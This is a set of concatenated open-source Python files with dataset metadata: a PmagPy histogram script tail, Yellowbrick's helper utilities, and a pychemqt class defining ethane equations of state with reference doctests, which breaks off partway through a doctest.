if '-N' in sys.argv:
norm = 0
if '-twin' in sys.argv:
norm = - 1
binsize = pmag.get_named_arg('-b', 0)
if '-xlab' in sys.argv:
ind = sys.argv.index('-xlab')
xlab = sys.argv[ind+1]
else:
xlab = 'x'
data = []
if not fname:
print('-I- Trying to read from stdin... <ctrl>-c to quit')
data = np.loadtxt(sys.stdin, dtype=np.float)
ipmag.histplot(fname, data, outfile, xlab, binsize, norm,
fmt, save_plots, interactive)
if __name__ == "__main__":
main()
|
bsd-3-clause
| 3,270,431,581,391,425,500
| 23.232877
| 74
| 0.58225
| false
| 3.509921
| false
| false
| false
|
pdamodaran/yellowbrick
|
yellowbrick/utils/helpers.py
|
1
|
6103
|
# yellowbrick.utils.helpers
# Helper functions and generic utilities for use in Yellowbrick code.
#
# Author: Benjamin Bengfort <bbengfort@districtdatalabs.com>
# Created: Fri May 19 10:39:30 2017 -0700
#
# Copyright (C) 2017 District Data Labs
# For license information, see LICENSE.txt
#
# ID: helpers.py [79cd8cf] benjamin@bengfort.com $
"""
Helper functions and generic utilities for use in Yellowbrick code.
"""
##########################################################################
## Imports
##########################################################################
import re
import numpy as np
from sklearn.pipeline import Pipeline
from .types import is_estimator
from yellowbrick.exceptions import YellowbrickTypeError
##########################################################################
## Model and Feature Information
##########################################################################
def get_model_name(model):
"""
Detects the model name for a Scikit-Learn model or pipeline.
Parameters
----------
model: class or instance
The object to determine the name for. If the model is an estimator it
returns the class name; if it is a Pipeline it returns the class name
of the final transformer or estimator in the Pipeline.
Returns
-------
name : string
The name of the model or pipeline.
"""
if not is_estimator(model):
raise YellowbrickTypeError(
"Cannot detect the model name for non estimator: '{}'".format(
type(model)
)
)
else:
if isinstance(model, Pipeline):
return get_model_name(model.steps[-1][-1])
else:
return model.__class__.__name__
def has_ndarray_int_columns(features, X):
""" Checks if numeric feature columns exist in ndarray """
_, ncols = X.shape
if not all(d.isdigit() for d in features if isinstance(d, str)) or not isinstance(X, np.ndarray):
return False
ndarray_columns = np.arange(0, ncols)
feature_cols = np.unique([int(d) for d in features])
return all(np.in1d(feature_cols, ndarray_columns))
# Alias for closer name to isinstance and issubclass
hasndarrayintcolumns = has_ndarray_int_columns
def is_monotonic(a, increasing=True):
"""
Tests whether a vector a has monotonicity.
Parameters
----------
a : array-like
Array that should be tested for monotonicity
increasing : bool, default: True
Test if the array is montonically increasing, otherwise test if the
array is montonically decreasing.
"""
a = np.asarray(a) # ensure a is array-like
if a.ndim > 1:
raise ValueError("not supported for multi-dimensonal arrays")
if len(a) <= 1:
return True
if increasing:
return np.all(a[1:] >= a[:-1], axis=0)
return np.all(a[1:] <= a[:-1], axis=0)
##########################################################################
## Numeric Computations
##########################################################################
#From here: http://stackoverflow.com/questions/26248654/numpy-return-0-with-divide-by-zero
def div_safe( numerator, denominator ):
"""
Ufunc-extension that returns 0 instead of nan when dividing numpy arrays
Parameters
----------
numerator: array-like
denominator: scalar or array-like that can be validly divided by the numerator
returns a numpy array
example: div_safe( [-1, 0, 1], 0 ) == [0, 0, 0]
"""
#First handle scalars
if np.isscalar(numerator):
raise ValueError("div_safe should only be used with an array-like numerator")
#Then numpy arrays
try:
with np.errstate(divide='ignore', invalid='ignore'):
result = np.true_divide( numerator, denominator )
result[ ~ np.isfinite( result )] = 0 # -inf inf NaN
return result
except ValueError as e:
raise e
def prop_to_size(vals, mi=0.0, ma=5.0, power=0.5, log=False):
"""
Converts an array of property values (e.g. a metric or score) to values
that are more useful for marker sizes, line widths, or other visual
sizes. The new sizes are computed as:
y = mi + (ma -mi)(\frac{x_i - min(x){max(x) - min(x)})^{power}
If ``log=True``, the natural logarithm of the property values is used instead.
Parameters
----------
prop : array-like, 1D
An array of values of the property to scale between the size range.
mi : float, default: 0.0
The size to assign the smallest property (minimum size value).
ma : float, default: 5.0
The size to assign the largest property (maximum size value).
power : float, default: 0.5
Used to control how rapidly the size increases from smallest to largest.
log : bool, default: False
Use the natural logarithm to compute the property sizes
Returns
-------
sizes : array, 1D
The new size values, in the same shape as the input prop array
"""
# ensure that prop is an array
vals = np.asarray(vals)
# apply natural log if specified
if log:
vals = np.log(vals)
# avoid division by zero error
delta = vals.max() - vals.min()
if delta == 0.0:
delta = 1.0
return mi + (ma-mi) * ((vals -vals.min()) / delta) ** power
##########################################################################
## String Computations
##########################################################################
def slugify(text):
"""
Returns a slug of given text, normalizing unicode data for file-safe
strings. Used for deciding where to write images to disk.
Parameters
----------
text : string
The string to slugify
Returns
-------
slug : string
A normalized slug representation of the text
.. seealso:: http://yashchandra.com/2014/05/08/how-to-generate-clean-url-or-a-slug-in-python/
"""
slug = re.sub(r'[^\w]+', ' ', text)
slug = "-".join(slug.lower().strip().split())
return slug
|
apache-2.0
| 4,644,387,337,907,354,000
| 28.626214
| 101
| 0.574144
| false
| 4.235253
| false
| false
| false
|
edusegzy/pychemqt
|
lib/mEoS/C2.py
|
1
|
34267
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
from lib.meos import MEoS
from lib import unidades
class C2(MEoS):
"""Multiparameter equation of state for ethane"""
name = "ethane"
CASNumber = "74-84-0"
formula = "CH3CH3"
synonym = "R-170"
rhoc = unidades.Density(206.18)
Tc = unidades.Temperature(305.322)
Pc = unidades.Pressure(4872.2, "kPa")
M = 30.06904 # g/mol
Tt = unidades.Temperature(90.368)
Tb = unidades.Temperature(184.569)
f_acent = 0.0995
momentoDipolar = unidades.DipoleMoment(0.0, "Debye")
id = 3
_Tr = unidades.Temperature(295.159630)
_rhor = unidades.Density(207.557649)
_w = 0.095234716
Fi1 = {"R": 8.314472,
"ao_log": [1, 3.003039265],
"pow": [0, 1],
"ao_pow": [9.212802589, -4.68224855],
"ao_exp": [1.117433359, 3.467773215, 6.941944640, 5.970850948],
"titao": [1.4091052332, 4.0099170712, 6.5967098342, 13.9798102659]}
Fi2 = {"ao_log": [1, 3.00263],
"pow": [0, 1],
"ao_pow": [24.675437527, -77.42531376],
"ao_exp": [], "titao": [],
"ao_hyp": [4.33939, 1.23722, 13.1974, -6.01989],
"hyp": [1.831882406, 0.731306621, 3.378007481, 3.508721939]}
Fi3 = {"ao_log": [1, 3.8159476],
"pow": [0, -1./3, -2./3, -1],
"ao_pow": [-23.446765, 8.6021299, -3.3075735, -.55956678],
"ao_exp": [5.0722267], "titao": [5.5074874],
"ao_hyp": [], "hyp": []}
CP5 = {"ao": 9.9507922459,
"an": [-6.9341406909e5, 3.1534834135e4, -6.103375287e2,
-2.8657877948e-2, 9.0922897821e-5, -5.2750109915e-8],
"pow": [-3, -2, -1.001, 1, 2, 3],
"ao_exp": [-1.4243593411e1], "exp": [3000],
"ao_hyp": [], "hyp": []}
helmholtz1 = {
"__type__": "Helmholtz",
"__name__": "Helmholtz equation of state for ethane of Buecker and Wagner (2006)",
"__doi__": {"autor": "Bücker, D., Wagner, W.",
"title": "A Reference Equation of State for the Thermodynamic Properties of Ethane for Temperatures from the Melting Line to 675 K and Pressures up to 900 MPa",
"ref": "J. Phys. Chem. Ref. Data 35, 205 (2006)",
"doi": "10.1063/1.1859286"},
"__test__":
# Table 29, Pag 238
"""
>>> st=C2(T=90.368, x=0.5)
>>> print "%0.6g %0.7f %0.5f %0.6f %0.5g %0.5g %0.4g %0.4g %0.4g %0.3f %0.4g %0.4g %0.2f %0.2f" % (\
st.T, st.P.MPa, st.Liquido.rho, st.Gas.rho, st.Liquido.h.kJkg, st.Gas.h.kJkg, \
st.Liquido.s.kJkgK, st.Gas.s.kJkgK, st.Liquido.cv.kJkgK, st.Gas.cv.kJkgK, \
st.Liquido.cp.kJkgK, st.Gas.cp.kJkgK, st.Liquido.w, st.Gas.w)
90.368 0.0000011 651.52948 0.000046 -888.9 -294.12 -5.058 1.524 1.605 0.892 2.326 1.168 2008.69 180.93
>>> st=C2(T=100, x=0.5)
>>> print "%0.6g %0.6f %0.5f %0.5f %0.5g %0.5g %0.4g %0.4g %0.4g %0.3f %0.4g %0.4g %0.2f %0.2f" % (\
st.T, st.P.MPa, st.Liquido.rho, st.Gas.rho, st.Liquido.h.kJkg, st.Gas.h.kJkg, \
st.Liquido.s.kJkgK, st.Gas.s.kJkgK, st.Liquido.cv.kJkgK, st.Gas.cv.kJkgK, \
st.Liquido.cp.kJkgK, st.Gas.cp.kJkgK, st.Liquido.w, st.Gas.w)
100 0.000011 640.94852 0.00040 -866.74 -282.78 -4.825 1.015 1.541 0.911 2.283 1.187 1938.44 189.86
>>> st=C2(T=130, x=0.5)
>>> print "%0.6g %0.6f %0.5f %0.5f %0.5g %0.5g %0.3f %0.3f %0.3f %0.3f %0.3f %0.3f %0.2f %0.2f" % (\
st.T, st.P.MPa, st.Liquido.rho, st.Gas.rho, st.Liquido.h.kJkg, st.Gas.h.kJkg, \
st.Liquido.s.kJkgK, st.Gas.s.kJkgK, st.Liquido.cv.kJkgK, st.Gas.cv.kJkgK, \
st.Liquido.cp.kJkgK, st.Gas.cp.kJkgK, st.Liquido.w, st.Gas.w)
130 0.001284 607.82999 0.03576 -798.36 -246.43 -4.227 0.019 1.462 0.977 2.293 1.256 1722.03 214.69
>>> st=C2(T=150, x=0.5)
>>> print "%0.6g %0.6f %0.5f %0.5f %0.5g %0.5g %0.3f %0.3f %0.3f %0.3f %0.3f %0.3f %0.2f %0.2f" % (\
st.T, st.P.MPa, st.Liquido.rho, st.Gas.rho, st.Liquido.h.kJkg, st.Gas.h.kJkg, \
st.Liquido.s.kJkgK, st.Gas.s.kJkgK, st.Liquido.cv.kJkgK, st.Gas.cv.kJkgK, \
st.Liquido.cp.kJkgK, st.Gas.cp.kJkgK, st.Liquido.w, st.Gas.w)
150 0.009638 585.16884 0.23373 -752.12 -221.71 -3.896 -0.360 1.442 1.027 2.333 1.312 1575.53 228.84
>>> st=C2(T=180, x=0.5)
>>> print "%0.6g %0.6f %0.5f %0.5f %0.5g %0.5g %0.3f %0.3f %0.3f %0.3f %0.3f %0.3f %0.2f %0.2f" % (\
st.T, st.P.MPa, st.Liquido.rho, st.Gas.rho, st.Liquido.h.kJkg, st.Gas.h.kJkg, \
st.Liquido.s.kJkgK, st.Gas.s.kJkgK, st.Liquido.cv.kJkgK, st.Gas.cv.kJkgK, \
st.Liquido.cp.kJkgK, st.Gas.cp.kJkgK, st.Liquido.w, st.Gas.w)
180 0.078638 549.50874 1.62533 -680.84 -185.53 -3.464 -0.712 1.434 1.098 2.421 1.409 1350.47 245.54
>>> st=C2(T=210, x=0.5)
>>> print "%0.6g %0.6f %0.5f %0.5f %0.5g %0.5g %0.3f %0.3f %0.3f %0.3f %0.3f %0.3f %0.2f %0.2f" % (\
st.T, st.P.MPa, st.Liquido.rho, st.Gas.rho, st.Liquido.h.kJkg, st.Gas.h.kJkg, \
st.Liquido.s.kJkgK, st.Gas.s.kJkgK, st.Liquido.cv.kJkgK, st.Gas.cv.kJkgK, \
st.Liquido.cp.kJkgK, st.Gas.cp.kJkgK, st.Liquido.w, st.Gas.w)
210 0.333796 510.45075 6.23900 -605.9 -153.48 -3.081 -0.927 1.454 1.228 2.572 1.622 1117.27 254.02
>>> st=C2(T=240, x=0.5)
>>> print "%0.6g %0.6f %0.5f %0.5f %0.5g %0.5g %0.3f %0.3f %0.3f %0.3f %0.3f %0.3f %0.2f %0.2f" % (\
st.T, st.P.MPa, st.Liquido.rho, st.Gas.rho, st.Liquido.h.kJkg, st.Gas.h.kJkg, \
st.Liquido.s.kJkgK, st.Gas.s.kJkgK, st.Liquido.cv.kJkgK, st.Gas.cv.kJkgK, \
st.Liquido.cp.kJkgK, st.Gas.cp.kJkgK, st.Liquido.w, st.Gas.w)
240 0.966788 465.30887 17.43487 -524.72 -128.82 -2.726 -1.077 1.507 1.388 2.847 1.976 873.25 252.14
>>> st=C2(T=270, x=0.5)
>>> print "%0.6g %0.6f %0.5f %0.5f %0.5g %0.5g %0.3f %0.3f %0.3f %0.3f %0.3f %0.3f %0.2f %0.2f" % (\
st.T, st.P.MPa, st.Liquido.rho, st.Gas.rho, st.Liquido.h.kJkg, st.Gas.h.kJkg, \
st.Liquido.s.kJkgK, st.Gas.s.kJkgK, st.Liquido.cv.kJkgK, st.Gas.cv.kJkgK, \
st.Liquido.cp.kJkgK, st.Gas.cp.kJkgK, st.Liquido.w, st.Gas.w)
270 2.209980 407.71776 42.08922 -432.13 -118.38 -2.375 -1.212 1.605 1.595 3.491 2.815 608.92 237.02
>>> st=C2(T=300, x=0.5)
>>> print "%0.6g %0.6f %0.5f %0.5f %0.5g %0.5g %0.3f %0.3f %0.3f %0.3f %0.3f %0.3f %0.2f %0.2f" % (\
st.T, st.P.MPa, st.Liquido.rho, st.Gas.rho, st.Liquido.h.kJkg, st.Gas.h.kJkg, \
st.Liquido.s.kJkgK, st.Gas.s.kJkgK, st.Liquido.cv.kJkgK, st.Gas.cv.kJkgK, \
st.Liquido.cp.kJkgK, st.Gas.cp.kJkgK, st.Liquido.w, st.Gas.w)
300 4.357255 303.50879 114.50091 -305.32 -155.61 -1.952 -1.453 1.912 2.089 10.022 13.299 274.91 200.51
>>> st=C2(T=305, x=0.5)
>>> print "%0.6g %0.6f %0.5f %0.5f %0.5g %0.5g %0.3f %0.3f %0.3f %0.3f %0.3f %0.3f %0.2f %0.2f" % (\
st.T, st.P.MPa, st.Liquido.rho, st.Gas.rho, st.Liquido.h.kJkg, st.Gas.h.kJkg, \
st.Liquido.s.kJkgK, st.Gas.s.kJkgK, st.Liquido.cv.kJkgK, st.Gas.cv.kJkgK, \
st.Liquido.cp.kJkgK, st.Gas.cp.kJkgK, st.Liquido.w, st.Gas.w)
305 4.839225 241.96149 170.75482 -255.73 -202.19 -1.794 -1.619 2.470 2.623 164.093 247.460 175.12 178.83
"""
# Table 30, Pag 243
"""
>>> st=C2(T=90.384, P=1e5)
>>> print "%0.6g %0.5g %0.5g %0.5g %0.5g %0.5g %0.5g %0.6g" % (\
st.T, st.rho, st.u.kJkg, st.h.kJkg, st.s.kJkgK, st.cv.kJkgK, st.cp.kJkgK, st.w)
90.384 651.55 -888.88 -888.73 -5.0574 1.6051 2.3256 2008.97
>>> st=C2(T=135, P=5e5)
>>> print "%0.6g %0.5g %0.5g %0.5g %0.5g %0.5g %0.5g %0.6g" % (\
st.T, st.rho, st.u.kJkg, st.h.kJkg, st.s.kJkgK, st.cv.kJkgK, st.cp.kJkgK, st.w)
135 602.5 -787.09 -786.26 -4.1415 1.4563 2.3009 1688.21
>>> st=C2(T=220, P=1e6)
>>> print "%0.6g %0.5g %0.5g %0.5g %0.5g %0.5g %0.5g %0.6g" % (\
st.T, st.rho, st.u.kJkg, st.h.kJkg, st.s.kJkgK, st.cv.kJkgK, st.cp.kJkgK, st.w)
220 497.12 -581.36 -579.35 -2.9641 1.4681 2.6365 1044.02
>>> st=C2(T=110, P=1.5e6)
>>> print "%0.6g %0.5g %0.5g %0.5g %0.5g %0.5g %0.5g %0.6g" % (\
st.T, st.rho, st.u.kJkg, st.h.kJkg, st.s.kJkgK, st.cv.kJkgK, st.cp.kJkgK, st.w)
110 630.62 -844.43 -842.05 -4.6118 1.5041 2.2713 1872.62
>>> st=C2(T=675, P=2e6)
>>> print "%0.6g %0.5g %0.5g %0.5g %0.5g %0.5g %0.5g %0.6g" % (\
st.T, st.rho, st.u.kJkg, st.h.kJkg, st.s.kJkgK, st.cv.kJkgK, st.cp.kJkgK, st.w)
675 10.756 754.73 940.67 1.1385 2.9468 3.2442 451.69
>>> st=C2(T=310, P=5e6)
>>> print "%0.6g %0.5g %0.5g %0.5g %0.5g %0.5g %0.5g %0.6g" % (\
st.T, st.rho, st.u.kJkg, st.h.kJkg, st.s.kJkgK, st.cv.kJkgK, st.cp.kJkgK, st.w)
310 123.88 -181.86 -141.49 -1.4246 1.9621 8.6868 211.1
>>> st=C2(T=160, P=1e7)
>>> print "%0.6g %0.5g %0.5g %0.5g %0.5g %0.5g %0.5g %0.6g" % (\
st.T, st.rho, st.u.kJkg, st.h.kJkg, st.s.kJkgK, st.cv.kJkgK, st.cp.kJkgK, st.w)
160 580.45 -734.04 -716.81 -3.7788 1.4493 2.3263 1563.69
>>> st=C2(T=500, P=2e7)
>>> print "%0.6g %0.5g %0.5g %0.5g %0.5g %0.5g %0.5g %0.5g" % (\
st.T, st.rho, st.u.kJkg, st.h.kJkg, st.s.kJkgK, st.cv.kJkgK, st.cp.kJkgK, st.w)
500 164.96 184.25 305.49 -0.5687 2.3996 3.2172 416.34
>>> st=C2(T=100, P=5e7)
>>> print "%0.6g %0.5g %0.5g %0.5g %0.5g %0.5g %0.5g %0.6g" % (\
st.T, st.rho, st.u.kJkg, st.h.kJkg, st.s.kJkgK, st.cv.kJkgK, st.cp.kJkgK, st.w)
100 658.54 -877.76 -801.84 -4.9448 1.6011 2.2516 2107.34
>>> st=C2(T=450, P=1e8)
>>> print "%0.6g %0.5g %0.5g %0.5g %0.5g %0.5g %0.5g %0.6g" % (\
st.T, st.rho, st.u.kJkg, st.h.kJkg, st.s.kJkgK, st.cv.kJkgK, st.cp.kJkgK, st.w)
450 428.87 -108.47 124.7 -1.471 2.2729 2.9465 1075.84
>>> st=C2(T=675, P=9e8)
>>> print "%0.6g %0.5g %0.5g %0.6g %0.5g %0.5g %0.5g %0.6g" % (\
st.T, st.rho, st.u.kJkg, st.h.kJkg, st.s.kJkgK, st.cv.kJkgK, st.cp.kJkgK, st.w)
675 632.88 443.09 1865.16 -0.95311 3.2264 3.638 2628.58
""",
"R": 8.314472,
"cp": Fi1,
"ref": "OTO",
"Tmin": Tt, "Tmax": 675.0, "Pmax": 900000.0, "rhomax": 22.419,
"Pmin": 0.00114, "rhomin": 21.668,
"nr1": [0.83440745735241, -0.14287360607171e1, 0.34430242210927,
-0.42096677920265, 0.12094500886549e-1],
"d1": [1, 1, 2, 2, 4],
"t1": [0.25, 1.00, 0.25, 0.75, 0.75],
"nr2": [-0.57976201597341, -0.33127037870838e-1, -0.11751654894130,
-0.11160957833067, 0.62181592654406e-1, 0.98481795434443e-1,
-0.98268582682358e-1, -0.23977831007049e-3, 0.69885663328821e-3,
0.19665987803305e-4, -0.14586152207928e-1, 0.46354100536781e-1,
0.60764622180645e-2, -0.26447330147828e-2, -0.42931872689904e-1,
0.29987786517263e-2, 0.52919335175010e-2, -0.10383897798198e-2,
-0.54260348214694e-1, -0.21959362918493, 0.35362456650354,
-0.12477390173714, 0.18425693591517, -0.16192256436754,
-0.82770876149064e-1, 0.50160758096437e-1, 0.93614326336655e-2,
-0.27839186242864e-3, 0.23560274071481e-4, 0.39238329738527e-2,
-0.76488325813618e-3, -0.49944304440730e-2,
0.18593386407186e-2, -0.61404353331199e-3],
"d2": [1, 1, 2, 2, 3, 6, 6, 7, 9, 10, 2, 4, 4, 5, 5, 6, 8, 9, 2, 3, 3,
3, 4, 4, 5, 5, 6, 11, 14, 3, 3, 4, 8, 10],
"t2": [2.00, 4.25, 0.75, 2.25, 3.00, 1.00, 1.25, 2.75, 1.00, 2.00,
2.50, 5.50, 7.00, 0.50, 5.50, 2.50, 4.00, 2.00, 10.00, 16.00,
18.00, 20.00, 14.00, 18.00, 12.00, 19.00, 7.00, 15.00, 9.00,
26.00, 28.00, 28.00, 22.00, 13.00],
"c2": [1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 2, 2, 2, 2, 2, 2, 2, 2, 3, 3, 3,
3, 3, 3, 3, 3, 3, 3, 3, 4, 4, 4, 4, 4],
"gamma2": [1]*34,
"nr3": [-0.23312179367924e-2, 0.29301047908760e-2, -0.26912472842883e-3,
0.18413834111814e3, -0.10397127984854e2],
"d3": [1, 1, 3, 3, 2],
"t3": [0., 3., 3., 0., 3.],
"alfa3": [15, 15, 15, 20, 20],
"beta3": [150, 150, 150, 275, 400],
"gamma3": [1.05, 1.05, 1.05, 1.22, 1.16],
"epsilon3": [1]*5}
MBWR = {
"__type__": "MBWR",
"__name__": "MBWR equation of state for ethane of Younglove and Ely (1987)",
"__doi__": {"autor": "Younglove, B.A. and Ely, J.F.",
"title": "Thermophysical Properties of Fluids. II. Methane, Ethane, Propane, Isobutane, and Normal Butane ",
"ref": "J. Phys. Chem. Ref. Data 16, 577 (1987)",
"doi": "10.1063/1.555785"},
"R": 8.31434,
"cp": CP5,
"ref": {"Tref": 298.15, "Pref": 101.325, "ho": 11874.2, "so": 229.116},
"Tmin": 90.348, "Tmax": 600.0, "Pmax": 70000.0, "rhomax": 21.68,
"Pmin": 1.1308e-3, "rhomin": 21.68,
"b": [None, -0.3204748852e-2, 0.6529792241, -0.1669704591e2,
0.1147983381e4, -0.1854721998e6, 0.4994149431e-3, -0.4858871291,
0.1225345776e3, 0.8622615988e5, -0.1081290283e-4, 0.6279096996e-1,
-0.1716912675e2, -0.1640779401e-3, -0.4356516111e-1, -0.1966649699e2,
0.4026724698e-2, -0.6498241861e-4, 0.5111594139e-1, -0.1113010349e-2,
-0.7157747547e4, -0.1848571024e8, -0.2137365569e4, 0.6275079986e8,
-0.9974911056e1, 0.1129115014e4, -0.1026469558, -0.5660525915e4,
-0.4209846430e-3, 0.2374523553, -0.1289637823e-5,
-0.5423801068e-3, 0.2239717230e-1]}
GERG = {
"__type__": "Helmholtz",
"__name__": "Helmholtz equation of state for ethane of Kunz and Wagner (2004).",
"__doi__": {"autor": "Kunz, O., Wagner, W.",
"title": "The GERG-2008 Wide-Range Equation of State for Natural Gases and Other Mixtures: An Expansion of GERG-2004",
"ref": "J. Chem. Eng. Data, 2012, 57 (11), pp 3032–3091",
"doi": "10.1021/je300655b"},
"R": 8.314472,
"cp": Fi2,
"ref": "OTO",
"Tmin": Tt, "Tmax": 675.0, "Pmax": 900000.0, "rhomax": 22.419,
# "Pmin": 0.61166, "rhomin": 55.497,
"nr1": [0.63596780450714, -0.17377981785459e1, 0.28914060926272,
-0.33714276845694, 0.22405964699561e-1, 0.15715424886913e-1],
"d1": [1, 1, 2, 2, 4, 4],
"t1": [0.125, 1.125, 0.375, 1.125, 0.625, 1.5],
"nr2": [0.11450634253745, 0.10612049379745e1, -0.12855224439423e1,
0.39414630777652, 0.31390924682041, -0.21592277117247e-1,
-0.21723666564905, -0.28999574439489, 0.42321173025732,
0.46434100259260e-1, -0.13138398329741, 0.11492850364368e-1,
-0.33387688429909e-1, 0.15183171583644e-1, -0.47610805647657e-2,
0.46917166277885e-1, -0.39401755804649e-1, -0.32569956247611e-2],
"d2": [1, 1, 1, 2, 3, 6, 2, 3, 3, 4, 4, 2, 3, 4, 5, 6, 6, 7],
"t2": [0.625, 2.625, 2.75, 2.125, 2, 1.75, 4.5, 4.75, 5, 4, 4.5, 7.5,
14, 11.5, 26, 28, 30, 16],
"c2": [1, 1, 1, 1, 1, 1, 2, 2, 2, 2, 2, 3, 3, 3, 6, 6, 6, 6],
"gamma2": [1]*18}
helmholtz3 = {
"__type__": "Helmholtz",
"__name__": "Helmholtz equation of state for ethane of Friend et al. (1991)",
"__doi__": {"autor": "Friend, D.G., Ingham, H., and Ely, J.F.",
"title": "Thermophysical Properties of Ethane",
"ref": "J. Phys. Chem. Ref. Data 20, 275 (1991)",
"doi": "10.1063/1.555881"},
"__test__":
# Table A1, Pag 336
"""
>>> st=C2(T=500, P=1e5, eq=3)
>>> print "%0.6g %0.1f %0.3f %0.3f %0.3f %0.3f %0.2f" % (\
st.T, st.aM0.kJkmol, st.hM0.kJkmol, st.sM0.kJkmolK, st.cpM0.kJkmolK)
500 -110.311 25.059 262.43 77.987
"""
# Table A2, Pag 337
"""
>>> st=C2(T=92, x=0.5, eq=3)
>>> print "%0.6g %0.1e %0.2f %0.2e %0.2f %0.1f %0.2f %0.1f" % (\
st.T, st.P.MPa, st.Liquido.rhoM, st.Gas.rhoM, st.Liquido.cpM.JmolK, \
st.Liquido.w, st.Liquido.mu.muPas, st.Liquido.k.mWmK)
92 1.7e-06 21.61 2.27e-06 67.74 1987.2 1193.00 254.4
>>> st=C2(T=100, x=0.5, eq=3)
>>> print "%0.6g %0.1e %0.2f %0.2e %0.2f %0.1f %0.2f %0.1f" % (\
st.T, st.P.MPa, st.Liquido.rhoM, st.Gas.rhoM, st.Liquido.cpM.JmolK, \
st.Liquido.w, st.Liquido.mu.muPas, st.Liquido.k.mWmK)
100 1.1e-05 21.32 1.33e-05 70.09 1937.6 876.96 248.1
>>> st=C2(T=150, x=0.5, eq=3)
>>> print "%0.6g %0.1e %0.2f %0.2e %0.2f %0.1f %0.2f %0.1f" % (\
st.T, st.P.MPa, st.Liquido.rhoM, st.Gas.rhoM, st.Liquido.cpM.JmolK, \
st.Liquido.w, st.Liquido.mu.muPas, st.Liquido.k.mWmK)
150 9.7e-3 19.47 7.80e-3 70.27 1573.2 270.35 201.0
>>> st=C2(T=200, x=0.5, eq=3)
>>> print "%0.6g %0.3f %0.2f %0.3f %0.2f %0.1f %0.2f %0.1f" % (\
st.T, st.P.MPa, st.Liquido.rhoM, st.Gas.rhoM, st.Liquido.cpM.JmolK, \
st.Liquido.w, st.Liquido.mu.muPas, st.Liquido.k.mWmK)
200 0.217 17.42 0.139 74.86 1194.4 138.17 152.5
>>> st=C2(T=250, x=0.5, eq=3)
>>> print "%0.6g %0.3f %0.2f %0.3f %0.2f %0.1f %0.2f %0.1f" % (\
st.T, st.P.MPa, st.Liquido.rhoM, st.Gas.rhoM, st.Liquido.cpM.JmolK, \
st.Liquido.w, st.Liquido.mu.muPas, st.Liquido.k.mWmK)
250 1.301 14.89 0.787 87.29 794.6 78.06 109.1
>>> st=C2(T=300, x=0.5, eq=3)
>>> print "%0.6g %0.3f %0.2f %0.3f %0.2f %0.1f %0.2f %0.1f" % (\
st.T, st.P.MPa, st.Liquido.rhoM, st.Gas.rhoM, st.Liquido.cpM.JmolK, \
st.Liquido.w, st.Liquido.mu.muPas, st.Liquido.k.mWmK)
300 4.356 10.10 3.813 182.06 278.4 35.01 71.3
>>> st=C2(T=302, x=0.5, eq=3)
>>> print "%0.6g %0.3f %0.2f %0.3f %0.2f %0.1f %0.2f %0.1f" % (\
st.T, st.P.MPa, st.Liquido.rhoM, st.Gas.rhoM, st.Liquido.cpM.JmolK, \
st.Liquido.w, st.Liquido.mu.muPas, st.Liquido.k.mWmK)
302 4.543 9.59 4.262 223.66 246.4 32.44 72.0
>>> st=C2(T=304, rhom=8.82, eq=3)
>>> print "%0.6g %0.3f %0.2f %0.3f %0.2f %0.1f %0.2f %0.1f" % (\
st.T, st.P.MPa, st.Liquido.rhoM, st.Gas.rhoM, st.Liquido.cpM.JmolK, \
st.Liquido.w, st.Liquido.mu.muPas, st.Liquido.k.mWmK)
304 4.738 8.82 4.969 354.78 209.4 28.97 79.0
"""
# Table A3, Pag 339
"""
>>> st=C2(T=130, P=1e6, eq=3)
>>> print "%0.6g %0.2g %0.2f %0.3f %0.2f %0.2f %0.2f %0.1f %0.2f %0.1f" % (\
st.T, st.P.MPa, st.rhoM, st.hM.kJmol, st.sM.JmolK, st.cvM.JmolK, \
st.cpM.JmolK, st.w, st.mu.muPas, st.k.mWmK)
130 1 20.24 -12.071 102.03 45.01 70.10 1726.9 392.40 221.3
>>> st=C2(T=140, P=6e7, eq=3)
>>> print "%0.6g %0.2g %0.2f %0.3f %0.2f %0.2f %0.2f %0.1f %0.2f %0.1f" % (\
st.T, st.P.MPa, st.rhoM, st.hM.kJmol, st.sM.JmolK, st.cvM.JmolK, \
st.cpM.JmolK, st.w, st.mu.muPas, st.k.mWmK)
140 60 20.80 -9.131 102.52 46.34 67.67 1921.7 476.29 245.7
>>> st=C2(T=160, P=2e6, eq=3)
>>> print "%0.6g %0.2g %0.2f %0.3f %0.2f %0.2f %0.2f %0.1f %0.2f %0.1f" % (\
st.T, st.P.MPa, st.rhoM, st.hM.kJmol, st.sM.JmolK, st.cvM.JmolK, \
st.cpM.JmolK, st.w, st.mu.muPas, st.k.mWmK)
160 2 19.13 -9.933 116.48 43.04 70.44 1511.1 235.10 192.5
>>> st=C2(T=180, P=1e5, eq=3)
>>> print "%0.6g %0.2g %0.2f %0.3f %0.2f %0.2f %0.2f %0.1f %0.2f %0.1f" % (\
st.T, st.P.MPa, st.rhoM, st.hM.kJmol, st.sM.JmolK, st.cvM.JmolK, \
st.cpM.JmolK, st.w, st.mu.muPas, st.k.mWmK)
180 0.1 18.28 -8.571 125.09 42.65 72.41 1347.8 176.42 171.5
>>> st=C2(T=200, P=1e7, eq=3)
>>> print "%0.6g %0.2g %0.2f %0.3f %0.2f %0.2f %0.2f %0.1f %0.2f %0.1f" % (\
st.T, st.P.MPa, st.rhoM, st.hM.kJmol, st.sM.JmolK, st.cvM.JmolK, \
st.cpM.JmolK, st.w, st.mu.muPas, st.k.mWmK)
200 10 17.79 -6.804 131.51 43.41 73.00 1281.7 151.38 161.5
>>> st=C2(T=240, P=1e6, eq=3)
>>> print "%0.6g %0.2g %0.2f %0.3f %0.2f %0.2f %0.2f %0.1f %0.2f %0.1f" % (\
st.T, st.P.MPa, st.rhoM, st.hM.kJmol, st.sM.JmolK, st.cvM.JmolK, \
st.cpM.JmolK, st.w, st.mu.muPas, st.k.mWmK)
240 1 15.47 -3.894 147.18 44.93 85.36 878.8 87.70 117.4
>>> st=C2(T=270, P=2e6, eq=3)
>>> print "%0.6g %0.2g %0.2f %0.3f %0.2f %0.2f %0.2f %0.1f %0.2f %0.1f" % (\
st.T, st.P.MPa, st.rhoM, st.hM.kJmol, st.sM.JmolK, st.cvM.JmolK, \
st.cpM.JmolK, st.w, st.mu.muPas, st.k.mWmK)
270 2 1.20 8.589 194.29 47.40 76.57 245.2 9.33 21.6
>>> st=C2(T=280, P=5e6, eq=3)
>>> print "%0.6g %0.2g %0.2f %0.3f %0.2f %0.2f %0.2f %0.1f %0.2f %0.1f" % (\
